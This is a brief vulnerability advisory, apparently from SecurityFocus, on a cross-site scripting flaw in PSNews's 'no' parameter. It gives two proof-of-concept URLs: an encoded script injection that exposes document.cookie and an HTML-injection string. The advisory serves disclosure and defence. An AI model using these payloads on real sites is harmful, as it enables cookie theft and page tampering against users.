PSNews No Parameter Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/index.php?function=show_all&no=%253cscript>alert%2528document.cookie);%253c/script>
http://www.example.com/index.php?function=add_kom&no=">%20<font%20size="20"%20color=red>%20<b>%20WackY%20%20</font>


 

Privacy Statement
Copyright 2010, SecurityFocus